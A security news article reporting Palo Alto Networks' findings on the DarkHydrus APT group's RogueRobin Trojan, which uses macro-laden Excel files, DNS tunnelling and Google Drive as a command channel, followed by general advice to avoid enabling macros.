DarkHydrus APT is found using Google Drive to communicate with RogueRobin Trojan horse

Malware related to DarkHydrus APT group is found manipulating the Google Drive functions

RogueRobin linked to DarkHydrus APT uses Google Drive as C&C serverThe infamous DarkHydrus APT group uses Google Drive API to spread RogueRobin Trojan horse.

Recently, computer security experts have spotted a new malware string that is considered to be related to the infamous cybercriminals known as DarkHydrus Advanced persistent threat (APT) group. This group has been known for its hazardous and illegitimate activities against government companies and educational institutions located in the Middle East.

In August 2018, cybercriminals were found manipulating a tool called Phisery which let them spread infected Office documents used to steal various credentials and sensitive information from numerous different targets.[1] The technique relies on a template which is loaded from a remote server. In this case, Microsoft Office requires credentials for an authentication which, once added, are sent to DarkHydrus.

Recently, the group has launched yet another attack against its victims in the Middle East.[2] However, according to Palo Alto Networks, it seems that now the cybercrooks are using Google Drive as their C&C server to spread RogueRobin Trojan horse and perform other malicious activities, as well as avoid detection by antivirus programs.

Virus functions rely on VBA macros

This time the hackers have been found using a backdoor Trojan horse called RogueRobin which is manipulating its victims to open an Excel file.[3] Once opened, this type of document offers to launch VBA macros. If launched, a harmful text document is planted in a specific location and the regsvr.32.exe program, which is related to the virus, is enabled. If such a thing happens, the RogueRobin Trojan horse is installed on the targeted system. Having in mind that the malicious program is written in a C# programming language, it makes it even more complicated.

According to cybersecurity specialists, they cannot clarify when did the malicious files were launched to proceed in attacks. However, experts do speculate that these malicious documents were created by the crooks between December 2018 and January 2019:[4]

Without the delivery mechanism we cannot confirm the exact time these delivery documents were used in an attack; however, the observed timestamps within these three delivery documents gives us an idea when the DarkHydrus actors created them. While the creation times were timestomped to a default time of 2006-09-16 00:00:00Z commonly observed in malicious documents, the Last Modified times were still available and suggest that DarkHydrus created these documents in December 2018 and January 2019.

RogueRobin includes numerous malicious features

Computer specialists have discovered that the new version of RogueRobin malware has a big variety of malicious functions:

  • to ensure that it is launched properly, the virus checks computer memory and other specifications in the targeted system;
  • an anti-debug code is included to the malicious program;
  • the malware receives information and performs communication with its C&C servers[5] through DNS packages;
  • the virus is using Google Drive APIs to get information from the crooks.

To prevent such an attack, users should note that enabling VBA macros should be performed with an extreme carefulness. They have already been disabled by Microsoft Windows by default and require manual actions to enable them. We advise staying very cautious while dealing with email messages from unknown senders.[6] Be careful and identify the sender and content first. Do not activate any suspicious-looking hyperlinks or attached files as they might come already infected with a dangerous threat.

About the author
Gabriel E. Hall
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

Contact Gabriel E. Hall
About the company Esolutions